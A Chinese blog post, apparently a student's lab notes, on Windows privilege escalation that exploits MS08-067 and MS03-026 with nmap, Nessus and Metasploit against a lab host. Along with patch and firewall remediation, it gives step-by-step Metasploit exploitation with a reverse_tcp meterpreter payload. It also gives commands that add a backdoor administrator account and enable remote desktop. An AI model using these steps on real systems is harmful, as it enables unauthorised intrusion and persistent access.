2018-08-09 Windows系统提权

今天主要学了如何利用windows操作系统的漏洞进行后门提权。主要用到的工具有nessus、metasploit、nmap。主要是使用了MS08_067和MS03_026两个漏洞进行实验。

nessus。Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。


【漏洞名称】

MS08-067:Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution(958644)(ECLIPSEDWING)(uncredentialed check)

【漏洞描述】

由于RPC请求处理不当,远程Windows主机受“服务器”服务中的远程执行代码漏洞影响。未经身份验证的远程攻击者可以通过特制的RPC请求利用此功能来执行具有“系统”权限的任意代码。ECLIPSEDWING是2017/04/14由一个名为Shadow Brokers的团体披露的多个Equation Group漏洞和漏洞之一

【解决措施】

1、更新打补丁,微软已经发布了相关补丁

2、普通用户可以将系统设置为禁止发起连接模式,阻断所有向本主机发起的连接

3、不需要开放RPC服务的服务器用户,可以设置TCP/IP筛选,只要不允许TCP139和445端口访问,漏洞就失效了

4、需要开放RPC服务的服务器用户可以打开DEP安全策略,或者安装主机IPS

【漏洞验证】

1、首先使用nmap扫描当前局域网内存活的主机,确定靶机,命令nmap -sV 10.10.10.0/24

2、确定目标主机为10.10.10.130,然后使用nessus扫描该ip,扫描出可利用的系统漏洞

3、确定要利用MS08-067之后,使用metasploit搜索可利用模块,search ms08_067

4、然后使用命令show payloads,选择攻击载荷windows/meterpreter/reverse_tcp

5、设置参数,rhost为10.10.10.130,lhost为10.10.10.128,target为3

6、exploit开始攻击。

攻击成功界面截图

【漏洞名称】

MS03-026: Microsoft RPC Interface Buffer Overrun (823980) (uncredentialed check)

【漏洞描述】

远程版本的Windows在其RPC接口中包含RemoteActivation()函数中的一个缺陷,该漏洞可能允许攻击者使用SYSTEM权限在远程主机上执行任意代码。

众所周知,一系列蠕虫(Blaster)会在野外利用此漏洞。

【解决措施】

1、更新打补丁,微软已经发布了相关补丁

2、安装第三方杀毒软件,以及入侵检测系统

3、配置防火墙和安全策略

4、关闭RPC服务等

【漏洞验证】

1、使用metasploit,输入命令search ms03_026,搜索利用模块并使用

2、设置参数,rhost为10.10.10.130,lhost为10.10.10.128,payload为windows/meterpreter/reverse_tcp,target只有一个,不用选,然后exploit,开始攻击

3、攻击成功后,输入shell,进入windows的一个命令行,可以执行任何系统指令,然后输入net user kotw windows /add;net localgroup administrators kotw /add,创建一个具有管理员权限的账户

4、exit命令退出shell,执行run getgui -e命令,使用meterpreter的强大功能开启靶机的远程桌面服务

5、打开一个终端,输入rdesktop 10.10.10.130,打开远程桌面连接,然后输入创建的账户密码,即可成功进入。

完成界面截图
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,772评论 6 477
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,458评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,610评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,640评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,657评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,590评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,962评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,631评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,870评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,611评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,704评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,386评论 4 319
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,969评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,944评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,179评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,742评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,440评论 2 342

推荐阅读更多精彩内容